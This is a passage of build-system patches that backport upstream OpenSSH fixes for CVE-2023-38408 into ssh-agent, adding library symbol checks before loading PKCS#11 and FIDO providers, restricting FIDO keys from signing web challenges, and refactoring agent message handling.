23 4 files changed, 86 insertions(+), 2 deletions(-)
24
25diff --git a/misc.c b/misc.c
26index 3a31d5c..8a107e4 100644
27--- a/misc.c
28+++ b/misc.c
29@@ -28,6 +28,7 @@
30
31 #include <sys/types.h>
32 #include <sys/ioctl.h>
33+#include <sys/mman.h>
34 #include <sys/socket.h>
35 #include <sys/stat.h>
36 #include <sys/time.h>
37@@ -41,6 +42,9 @@
38 #ifdef HAVE_POLL_H
39 #include <poll.h>
40 #endif
41+#ifdef HAVE_NLIST_H
42+#include <nlist.h>
43+#endif
44 #include <signal.h>
45 #include <stdarg.h>
46 #include <stdio.h>
47@@ -2266,3 +2270,76 @@ ssh_signal(int signum, sshsig_t handler)
48 }
49 return osa.sa_handler;
50 }
51+
52+
53+/*
54+ * Returns zero if the library at 'path' contains symbol 's', nonzero
55+ * otherwise.
56+ */
57+int
58+lib_contains_symbol(const char *path, const char *s)
59+{
60+#ifdef HAVE_NLIST_H
61+ struct nlist nl[2];
62+ int ret = -1, r;
63+
64+ memset(nl, 0, sizeof(nl));
65+ nl[0].n_name = xstrdup(s);
66+ nl[1].n_name = NULL;
67+ if ((r = nlist(path, nl)) == -1) {
68+ error("%s: nlist failed for %s", __func__, path);
69+ goto out;
70+ }
71+ if (r != 0 || nl[0].n_value == 0 || nl[0].n_type == 0) {
72+ error("%s: library %s does not contain symbol %s", __func__, path, s);
73+ goto out;
74+ }
75+ /* success */
76+ ret = 0;
77+ out:
78+ free(nl[0].n_name);
79+ return ret;
80+#else /* HAVE_NLIST_H */
81+ int fd, ret = -1;
82+ struct stat st;
83+ void *m = NULL;
84+ size_t sz = 0;
85+
86+ memset(&st, 0, sizeof(st));
87+ if ((fd = open(path, O_RDONLY)) < 0) {
88+ error("%s: open %s: %s", __func__, path, strerror(errno));
89+ return -1;
90+ }
91+ if (fstat(fd, &st) != 0) {
92+ error("%s: fstat %s: %s", __func__, path, strerror(errno));
93+ goto out;
94+ }
95+ if (!S_ISREG(st.st_mode)) {
96+ error("%s: %s is not a regular file", __func__, path);
97+ goto out;
98+ }
99+ if (st.st_size < 0 ||
100+ (size_t)st.st_size < strlen(s) ||
101+ st.st_size >= INT_MAX/2) {
102+ error("%s: %s bad size %lld", __func__, path, (long long)st.st_size);
103+ goto out;
104+ }
105+ sz = (size_t)st.st_size;
106+ if ((m = mmap(NULL, sz, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED ||
107+ m == NULL) {
108+ error("%s: mmap %s: %s", __func__, path, strerror(errno));
109+ goto out;
110+ }
111+ if (memmem(m, sz, s, strlen(s)) == NULL) {
112+ error("%s: %s does not contain expected string %s", __func__, path, s);
113+ goto out;
114+ }
115+ /* success */
116+ ret = 0;
117+ out:
118+ if (m != NULL && m != MAP_FAILED)
119+ munmap(m, sz);
120+ close(fd);
121+ return ret;
122+#endif /* HAVE_NLIST_H */
123+}
124diff --git a/misc.h b/misc.h
125index 4a05db2..3f9f4db 100644
126--- a/misc.h
127+++ b/misc.h
128@@ -86,6 +86,7 @@ const char *atoi_err(const char *, int *);
129 int parse_absolute_time(const char *, uint64_t *);
130 void format_absolute_time(uint64_t, char *, size_t);
131 int path_absolute(const char *);
132+int lib_contains_symbol(const char *, const char *);
133
134 void sock_set_v6only(int);
135
136diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
137index b56a41b..639a6f7 100644
138--- a/ssh-pkcs11.c
139+++ b/ssh-pkcs11.c
140@@ -1499,6 +1499,10 @@ pkcs11_register_provider(char *provider_id, char *pin,
141 __func__, provider_id);
142 goto fail;
143 }
144+ if (lib_contains_symbol(provider_id, "C_GetFunctionList") != 0) {
145+ error("provider %s is not a PKCS11 library", provider_id);
146+ goto fail;
147+ }
148 /* open shared pkcs11-library */
149 if ((handle = dlopen(provider_id, RTLD_NOW)) == NULL) {
150 error("dlopen %s failed: %s", provider_id, dlerror());
151diff --git a/ssh-sk.c b/ssh-sk.c
152index 5ff9381..9df12cc 100644
153--- a/ssh-sk.c
154+++ b/ssh-sk.c
155@@ -119,10 +119,12 @@ sshsk_open(const char *path)
156 #endif
157 return ret;
158 }
159- if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL) {
160- error("Provider \"%s\" dlopen failed: %s", path, dlerror());
161+ if (lib_contains_symbol(path, "sk_api_version") != 0) {
162+ error("provider %s is not an OpenSSH FIDO library", path);
163 goto fail;
164 }
165+ if ((ret->dlhandle = dlopen(path, RTLD_NOW)) == NULL)
166+ fatal("Provider \"%s\" dlopen failed: %s", path, dlerror());
167 if ((ret->sk_api_version = dlsym(ret->dlhandle,
168 "sk_api_version")) == NULL) {
169 error("Provider \"%s\" dlsym(sk_api_version) failed: %s",
170--
1712.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
new file mode 100644
index 0000000000..5e8040c9bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-04.patch
@@ -0,0 +1,34 @@
1From 0862f338941bfdfb2cadee87de6d5fdca1b8f457 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Wed, 19 Jul 2023 13:55:53 +0000
4Subject: [PATCH 04/12] upstream: terminate process if requested to load a
5 PKCS#11 provider that isn't a PKCS#11 provider; from / ok markus@
6
7OpenBSD-Commit-ID: 39532cf18b115881bb4cfaee32084497aadfa05c
8
9Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/892506b13654301f69f9545f48213fc210e5c5cc]
10CVE: CVE-2023-38408
11Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
12---
13 ssh-pkcs11.c | 6 ++----
14 1 file changed, 2 insertions(+), 4 deletions(-)
15
16diff --git a/ssh-pkcs11.c b/ssh-pkcs11.c
17index 639a6f7..7530acc 100644
18--- a/ssh-pkcs11.c
19+++ b/ssh-pkcs11.c
20@@ -1508,10 +1508,8 @@ pkcs11_register_provider(char *provider_id, char *pin,
21 error("dlopen %s failed: %s", provider_id, dlerror());
22 goto fail;
23 }
24- if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL) {
25- error("dlsym(C_GetFunctionList) failed: %s", dlerror());
26- goto fail;
27- }
28+ if ((getfunctionlist = dlsym(handle, "C_GetFunctionList")) == NULL)
29+ fatal("dlsym(C_GetFunctionList) failed: %s", dlerror());
30 p = xcalloc(1, sizeof(*p));
31 p->name = xstrdup(provider_id);
32 p->handle = handle;
33--
342.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
new file mode 100644
index 0000000000..0ddbdc68d4
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-05.patch
@@ -0,0 +1,194 @@
1From a6cee3905edf070c0de135d3f2ee5b74da1dbd28 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Tue, 26 May 2020 01:26:58 +0000
4Subject: [PATCH 05/12] upstream: Restrict ssh-agent from signing web
5 challenges for FIDO
6
7keys.
8
9When signing messages in ssh-agent using a FIDO key that has an
10application string that does not start with "ssh:", ensure that the
11message being signed is one of the forms expected for the SSH protocol
12(currently pubkey authentication and sshsig signatures).
13
14This prevents ssh-agent forwarding on a host that has FIDO keys
15attached granting the ability for the remote side to sign challenges
16for web authentication using those keys too.
17
18Note that the converse case of web browsers signing SSH challenges is
19already precluded because no web RP can have the "ssh:" prefix in the
20application string that we require.
21
22ok markus@
23
24OpenBSD-Commit-ID: 9ab6012574ed0352d2f097d307f4a988222d1b19
25
26Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/0c111eb84efba7c2a38b2cc3278901a0123161b9]
27CVE: CVE-2023-38408
28Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
29---
30 ssh-agent.c | 110 +++++++++++++++++++++++++++++++++++++++++++++++-----
31 1 file changed, 100 insertions(+), 10 deletions(-)
32
33diff --git a/ssh-agent.c b/ssh-agent.c
34index ceb348c..1794f35 100644
35--- a/ssh-agent.c
36+++ b/ssh-agent.c
37@@ -1,4 +1,4 @@
38-/* $OpenBSD: ssh-agent.c,v 1.255 2020/02/06 22:30:54 naddy Exp $ */
39+/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
40 /*
41 * Author: Tatu Ylonen <ylo@cs.hut.fi>
42 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
43@@ -77,6 +77,7 @@
44
45 #include "xmalloc.h"
46 #include "ssh.h"
47+#include "ssh2.h"
48 #include "sshbuf.h"
49 #include "sshkey.h"
50 #include "authfd.h"
51@@ -167,6 +168,9 @@ static long lifetime = 0;
52
53 static int fingerprint_hash = SSH_FP_HASH_DEFAULT;
54
55+/* Refuse signing of non-SSH messages for web-origin FIDO keys */
56+static int restrict_websafe = 1;
57+
58 static void
59 close_socket(SocketEntry *e)
60 {
61@@ -282,6 +286,80 @@ agent_decode_alg(struct sshkey *key, u_int flags)
62 return NULL;
63 }
64
65+/*
66+ * This function inspects a message to be signed by a FIDO key that has a
67+ * web-like application string (i.e. one that does not begin with "ssh:".
68+ * It checks that the message is one of those expected for SSH operations
69+ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
70+ * for the web.
71+ */
72+static int
73+check_websafe_message_contents(struct sshkey *key,
74+ const u_char *msg, size_t len)
75+{
76+ int matched = 0;
77+ struct sshbuf *b;
78+ u_char m, n;
79+ char *cp1 = NULL, *cp2 = NULL;
80+ int r;
81+ struct sshkey *mkey = NULL;
82+
83+ if ((b = sshbuf_from(msg, len)) == NULL)
84+ fatal("%s: sshbuf_new", __func__);
85+
86+ /* SSH userauth request */
87+ if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
88+ (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
89+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
90+ (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
91+ (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
92+ (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
93+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
94+ (r = sshkey_froms(b, &mkey)) == 0 && /* key */
95+ sshbuf_len(b) == 0) {
96+ debug("%s: parsed userauth", __func__);
97+ if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
98+ strcmp(cp1, "ssh-connection") == 0 &&
99+ strcmp(cp2, "publickey") == 0 &&
100+ sshkey_equal(key, mkey)) {
101+ debug("%s: well formed userauth", __func__);
102+ matched = 1;
103+ }
104+ }
105+ free(cp1);
106+ free(cp2);
107+ sshkey_free(mkey);
108+ sshbuf_free(b);
109+ if (matched)
110+ return 1;
111+
112+ if ((b = sshbuf_from(msg, len)) == NULL)
113+ fatal("%s: sshbuf_new", __func__);
114+ cp1 = cp2 = NULL;
115+ mkey = NULL;
116+
117+ /* SSHSIG */
118+ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
119+ (r = sshbuf_consume(b, 6)) == 0 &&
120+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
121+ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
122+ (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
123+ (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
124+ sshbuf_len(b) == 0) {
125+ debug("%s: parsed sshsig", __func__);
126+ matched = 1;
127+ }
128+
129+ sshbuf_free(b);
130+ if (matched)
131+ return 1;
132+
133+ /* XXX CA signature operation */
134+
135+ error("web-origin key attempting to sign non-SSH message");
136+ return 0;
137+}
138+
139 /* ssh2 only */
140 static void
141 process_sign_request2(SocketEntry *e)
142@@ -314,14 +392,20 @@ process_sign_request2(SocketEntry *e)
143 verbose("%s: user refused key", __func__);
144 goto send;
145 }
146- if (sshkey_is_sk(id->key) &&
147- (id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
148- if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
149- SSH_FP_DEFAULT)) == NULL)
150- fatal("%s: fingerprint failed", __func__);
151- notifier = notify_start(0,
152- "Confirm user presence for key %s %s",
153- sshkey_type(id->key), fp);
154+ if (sshkey_is_sk(id->key)) {
155+ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
156+ !check_websafe_message_contents(key, data, dlen)) {
157+ /* error already logged */
158+ goto send;
159+ }
160+ if ((id->key->sk_flags & SSH_SK_USER_PRESENCE_REQD)) {
161+ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
162+ SSH_FP_DEFAULT)) == NULL)
163+ fatal("%s: fingerprint failed", __func__);
164+ notifier = notify_start(0,
165+ "Confirm user presence for key %s %s",
166+ sshkey_type(id->key), fp);
167+ }
168 }
169 if ((r = sshkey_sign(id->key, &signature, &slen,
170 data, dlen, agent_decode_alg(key, flags),
171@@ -1214,7 +1298,7 @@ main(int ac, char **av)
172 __progname = ssh_get_progname(av[0]);
173 seed_rng();
174
175- while ((ch = getopt(ac, av, "cDdksE:a:P:t:")) != -1) {
176+ while ((ch = getopt(ac, av, "cDdksE:a:O:P:t:")) != -1) {
177 switch (ch) {
178 case 'E':
179 fingerprint_hash = ssh_digest_alg_by_name(optarg);
180@@ -1229,6 +1313,12 @@ main(int ac, char **av)
181 case 'k':
182 k_flag++;
183 break;
184+ case 'O':
185+ if (strcmp(optarg, "no-restrict-websafe") == 0)
186+ restrict_websafe = 0;
187+ else
188+ fatal("Unknown -O option");
189+ break;
190 case 'P':
191 if (provider_whitelist != NULL)
192 fatal("-P option already specified");
193--
1942.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
new file mode 100644
index 0000000000..ac494aab0b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
@@ -0,0 +1,73 @@
1From a5d845b7b42861d18f43e83de9f24c7374d1b458 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Fri, 18 Sep 2020 08:16:38 +0000
4Subject: [PATCH 06/12] upstream: handle multiple messages in a single read()
5
6PR#183 by Dennis Kaarsemaker; feedback and ok markus@
7
8OpenBSD-Commit-ID: 8570bb4d02d00cf70b98590716ea6a7d1cce68d1
9
10Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/52a03e9fca2d74eef953ddd4709250f365ca3975]
11CVE: CVE-2023-38408
12Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
13---
14 ssh-agent.c | 19 +++++++++++++------
15 1 file changed, 13 insertions(+), 6 deletions(-)
16
17diff --git a/ssh-agent.c b/ssh-agent.c
18index 1794f35..78f7268 100644
19--- a/ssh-agent.c
20+++ b/ssh-agent.c
21@@ -1,4 +1,4 @@
22-/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
23+/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
24 /*
25 * Author: Tatu Ylonen <ylo@cs.hut.fi>
26 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
27@@ -853,8 +853,10 @@ send:
28 }
29 #endif /* ENABLE_PKCS11 */
30
31-/* dispatch incoming messages */
32-
33+/*
34+ * dispatch incoming message.
35+ * returns 1 on success, 0 for incomplete messages or -1 on error.
36+ */
37 static int
38 process_message(u_int socknum)
39 {
40@@ -908,7 +910,7 @@ process_message(u_int socknum)
41 /* send a fail message for all other request types */
42 send_status(e, 0);
43 }
44- return 0;
45+ return 1;
46 }
47
48 switch (type) {
49@@ -952,7 +954,7 @@ process_message(u_int socknum)
50 send_status(e, 0);
51 break;
52 }
53- return 0;
54+ return 1;
55 }
56
57 static void
58@@ -1043,7 +1045,12 @@ handle_conn_read(u_int socknum)
59 if ((r = sshbuf_put(sockets[socknum].input, buf, len)) != 0)
60 fatal("%s: buffer error: %s", __func__, ssh_err(r));
61 explicit_bzero(buf, sizeof(buf));
62- process_message(socknum);
63+ for (;;) {
64+ if ((r = process_message(socknum)) == -1)
65+ return -1;
66+ else if (r == 0)
67+ break;
68+ }
69 return 0;
70 }
71
72--
732.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
new file mode 100644
index 0000000000..0dcf23ae17
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
@@ -0,0 +1,125 @@
1From 653cc18c922fc387b3d3aa1b081c5e5283cce28a Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Tue, 26 Jan 2021 00:47:47 +0000
4Subject: [PATCH 07/12] upstream: use recallocarray to allocate the agent
5 sockets table;
6
7also clear socket entries that are being marked as unused.
8
9spinkle in some debug2() spam to make it easier to watch an agent
10do its thing.
11
12ok markus
13
14OpenBSD-Commit-ID: 74582c8e82e96afea46f6c7b6813a429cbc75922
15
16Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1fe16fd61bb53944ec510882acc0491abd66ff76]
17CVE: CVE-2023-38408
18Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
19---
20 ssh-agent.c | 20 ++++++++++++++++----
21 1 file changed, 16 insertions(+), 4 deletions(-)
22
23diff --git a/ssh-agent.c b/ssh-agent.c
24index 78f7268..2635bc5 100644
25--- a/ssh-agent.c
26+++ b/ssh-agent.c
27@@ -1,4 +1,4 @@
28-/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
29+/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
30 /*
31 * Author: Tatu Ylonen <ylo@cs.hut.fi>
32 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
33@@ -175,11 +175,12 @@ static void
34 close_socket(SocketEntry *e)
35 {
36 close(e->fd);
37- e->fd = -1;
38- e->type = AUTH_UNUSED;
39 sshbuf_free(e->input);
40 sshbuf_free(e->output);
41 sshbuf_free(e->request);
42+ memset(e, '\0', sizeof(*e));
43+ e->fd = -1;
44+ e->type = AUTH_UNUSED;
45 }
46
47 static void
48@@ -249,6 +250,8 @@ process_request_identities(SocketEntry *e)
49 struct sshbuf *msg;
50 int r;
51
52+ debug2("%s: entering", __func__);
53+
54 if ((msg = sshbuf_new()) == NULL)
55 fatal("%s: sshbuf_new failed", __func__);
56 if ((r = sshbuf_put_u8(msg, SSH2_AGENT_IDENTITIES_ANSWER)) != 0 ||
57@@ -441,6 +444,7 @@ process_remove_identity(SocketEntry *e)
58 struct sshkey *key = NULL;
59 Identity *id;
60
61+ debug2("%s: entering", __func__);
62 if ((r = sshkey_froms(e->request, &key)) != 0) {
63 error("%s: get key: %s", __func__, ssh_err(r));
64 goto done;
65@@ -467,6 +471,7 @@ process_remove_all_identities(SocketEntry *e)
66 {
67 Identity *id;
68
69+ debug2("%s: entering", __func__);
70 /* Loop over all identities and clear the keys. */
71 for (id = TAILQ_FIRST(&idtab->idlist); id;
72 id = TAILQ_FIRST(&idtab->idlist)) {
73@@ -520,6 +525,7 @@ process_add_identity(SocketEntry *e)
74 u_char ctype;
75 int r = SSH_ERR_INTERNAL_ERROR;
76
77+ debug2("%s: entering", __func__);
78 if ((r = sshkey_private_deserialize(e->request, &k)) != 0 ||
79 k == NULL ||
80 (r = sshbuf_get_cstring(e->request, &comment, NULL)) != 0) {
81@@ -667,6 +673,7 @@ process_lock_agent(SocketEntry *e, int lock)
82 static u_int fail_count = 0;
83 size_t pwlen;
84
85+ debug2("%s: entering", __func__);
86 /*
87 * This is deliberately fatal: the user has requested that we lock,
88 * but we can't parse their request properly. The only safe thing to
89@@ -738,6 +745,7 @@ process_add_smartcard_key(SocketEntry *e)
90 struct sshkey **keys = NULL, *k;
91 Identity *id;
92
93+ debug2("%s: entering", __func__);
94 if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
95 (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
96 error("%s: buffer error: %s", __func__, ssh_err(r));
97@@ -818,6 +826,7 @@ process_remove_smartcard_key(SocketEntry *e)
98 int r, success = 0;
99 Identity *id, *nxt;
100
101+ debug2("%s: entering", __func__);
102 if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
103 (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
104 error("%s: buffer error: %s", __func__, ssh_err(r));
105@@ -962,6 +971,8 @@ new_socket(sock_type type, int fd)
106 {
107 u_int i, old_alloc, new_alloc;
108
109+ debug("%s: type = %s", __func__, type == AUTH_CONNECTION ? "CONNECTION" :
110+ (type == AUTH_SOCKET ? "SOCKET" : "UNKNOWN"));
111 set_nonblock(fd);
112
113 if (fd > max_fd)
114@@ -981,7 +992,8 @@ new_socket(sock_type type, int fd)
115 }
116 old_alloc = sockets_alloc;
117 new_alloc = sockets_alloc + 10;
118- sockets = xreallocarray(sockets, new_alloc, sizeof(sockets[0]));
119+ sockets = xrecallocarray(sockets, old_alloc, new_alloc,
120+ sizeof(sockets[0]));
121 for (i = old_alloc; i < new_alloc; i++)
122 sockets[i].type = AUTH_UNUSED;
123 sockets_alloc = new_alloc;
124--
1252.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
new file mode 100644
index 0000000000..141c8113bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
@@ -0,0 +1,315 @@
1From c30158ea225cf8ad67c3dcc88fa9e4afbf8959a7 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Tue, 26 Jan 2021 00:53:31 +0000
4Subject: [PATCH 08/12] upstream: more ssh-agent refactoring
5
6Allow confirm_key() to accept an additional reason suffix
7
8Factor publickey userauth parsing out into its own function and allow
9it to optionally return things it parsed out of the message to its
10caller.
11
12feedback/ok markus@
13
14OpenBSD-Commit-ID: 29006515617d1aa2d8b85cd2bf667e849146477e
15
16Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/e0e8bee8024fa9e31974244d14f03d799e5c0775]
17CVE: CVE-2023-38408
18Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
19---
20 ssh-agent.c | 197 ++++++++++++++++++++++++++++++++++------------------
21 1 file changed, 130 insertions(+), 67 deletions(-)
22
23diff --git a/ssh-agent.c b/ssh-agent.c
24index 2635bc5..7ad323c 100644
25--- a/ssh-agent.c
26+++ b/ssh-agent.c
27@@ -1,4 +1,4 @@
28-/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
29+/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
30 /*
31 * Author: Tatu Ylonen <ylo@cs.hut.fi>
32 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
33@@ -216,15 +216,16 @@ lookup_identity(struct sshkey *key)
34
35 /* Check confirmation of keysign request */
36 static int
37-confirm_key(Identity *id)
38+confirm_key(Identity *id, const char *extra)
39 {
40 char *p;
41 int ret = -1;
42
43 p = sshkey_fingerprint(id->key, fingerprint_hash, SSH_FP_DEFAULT);
44 if (p != NULL &&
45- ask_permission("Allow use of key %s?\nKey fingerprint %s.",
46- id->comment, p))
47+ ask_permission("Allow use of key %s?\nKey fingerprint %s.%s%s",
48+ id->comment, p,
49+ extra == NULL ? "" : "\n", extra == NULL ? "" : extra))
50 ret = 0;
51 free(p);
52
53@@ -290,74 +291,133 @@ agent_decode_alg(struct sshkey *key, u_int flags)
54 }
55
56 /*
57- * This function inspects a message to be signed by a FIDO key that has a
58- * web-like application string (i.e. one that does not begin with "ssh:".
59- * It checks that the message is one of those expected for SSH operations
60- * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
61- * for the web.
62+ * Attempt to parse the contents of a buffer as a SSH publickey userauth
63+ * request, checking its contents for consistency and matching the embedded
64+ * key against the one that is being used for signing.
65+ * Note: does not modify msg buffer.
66+ * Optionally extract the username and session ID from the request.
67 */
68 static int
69-check_websafe_message_contents(struct sshkey *key,
70- const u_char *msg, size_t len)
71+parse_userauth_request(struct sshbuf *msg, const struct sshkey *expected_key,
72+ char **userp, struct sshbuf **sess_idp)
73 {
74- int matched = 0;
75- struct sshbuf *b;
76- u_char m, n;
77- char *cp1 = NULL, *cp2 = NULL;
78+ struct sshbuf *b = NULL, *sess_id = NULL;
79+ char *user = NULL, *service = NULL, *method = NULL, *pkalg = NULL;
80 int r;
81+ u_char t, sig_follows;
82 struct sshkey *mkey = NULL;
83
84- if ((b = sshbuf_from(msg, len)) == NULL)
85- fatal("%s: sshbuf_new", __func__);
86+ if (userp != NULL)
87+ *userp = NULL;
88+ if (sess_idp != NULL)
89+ *sess_idp = NULL;
90+ if ((b = sshbuf_fromb(msg)) == NULL)
91+ fatal("%s: sshbuf_fromb", __func__);
92
93 /* SSH userauth request */
94- if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
95- (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
96- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
97- (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
98- (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
99- (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
100- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
101- (r = sshkey_froms(b, &mkey)) == 0 && /* key */
102- sshbuf_len(b) == 0) {
103- debug("%s: parsed userauth", __func__);
104- if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
105- strcmp(cp1, "ssh-connection") == 0 &&
106- strcmp(cp2, "publickey") == 0 &&
107- sshkey_equal(key, mkey)) {
108- debug("%s: well formed userauth", __func__);
109- matched = 1;
110- }
111+ if ((r = sshbuf_froms(b, &sess_id)) != 0)
112+ goto out;
113+ if (sshbuf_len(sess_id) == 0) {
114+ r = SSH_ERR_INVALID_FORMAT;
115+ goto out;
116 }
117- free(cp1);
118- free(cp2);
119- sshkey_free(mkey);
120+ if ((r = sshbuf_get_u8(b, &t)) != 0 || /* SSH2_MSG_USERAUTH_REQUEST */
121+ (r = sshbuf_get_cstring(b, &user, NULL)) != 0 || /* server user */
122+ (r = sshbuf_get_cstring(b, &service, NULL)) != 0 || /* service */
123+ (r = sshbuf_get_cstring(b, &method, NULL)) != 0 || /* method */
124+ (r = sshbuf_get_u8(b, &sig_follows)) != 0 || /* sig-follows */
125+ (r = sshbuf_get_cstring(b, &pkalg, NULL)) != 0 || /* alg */
126+ (r = sshkey_froms(b, &mkey)) != 0) /* key */
127+ goto out;
128+ if (t != SSH2_MSG_USERAUTH_REQUEST ||
129+ sig_follows != 1 ||
130+ strcmp(service, "ssh-connection") != 0 ||
131+ !sshkey_equal(expected_key, mkey) ||
132+ sshkey_type_from_name(pkalg) != expected_key->type) {
133+ r = SSH_ERR_INVALID_FORMAT;
134+ goto out;
135+ }
136+ if (strcmp(method, "publickey") != 0) {
137+ r = SSH_ERR_INVALID_FORMAT;
138+ goto out;
139+ }
140+ if (sshbuf_len(b) != 0) {
141+ r = SSH_ERR_INVALID_FORMAT;
142+ goto out;
143+ }
144+ /* success */
145+ r = 0;
146+ debug("%s: well formed userauth", __func__);
147+ if (userp != NULL) {
148+ *userp = user;
149+ user = NULL;
150+ }
151+ if (sess_idp != NULL) {
152+ *sess_idp = sess_id;
153+ sess_id = NULL;
154+ }
155+ out:
156 sshbuf_free(b);
157- if (matched)
158- return 1;
159+ sshbuf_free(sess_id);
160+ free(user);
161+ free(service);
162+ free(method);
163+ free(pkalg);
164+ sshkey_free(mkey);
165+ return r;
166+}
167
168- if ((b = sshbuf_from(msg, len)) == NULL)
169- fatal("%s: sshbuf_new", __func__);
170- cp1 = cp2 = NULL;
171- mkey = NULL;
172-
173- /* SSHSIG */
174- if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
175- (r = sshbuf_consume(b, 6)) == 0 &&
176- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
177- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
178- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
179- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
180- sshbuf_len(b) == 0) {
181- debug("%s: parsed sshsig", __func__);
182- matched = 1;
183- }
184+/*
185+ * Attempt to parse the contents of a buffer as a SSHSIG signature request.
186+ * Note: does not modify buffer.
187+ */
188+static int
189+parse_sshsig_request(struct sshbuf *msg)
190+{
191+ int r;
192+ struct sshbuf *b;
193
194+ if ((b = sshbuf_fromb(msg)) == NULL)
195+ fatal("%s: sshbuf_fromb", __func__);
196+
197+ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) != 0 ||
198+ (r = sshbuf_consume(b, 6)) != 0 ||
199+ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* namespace */
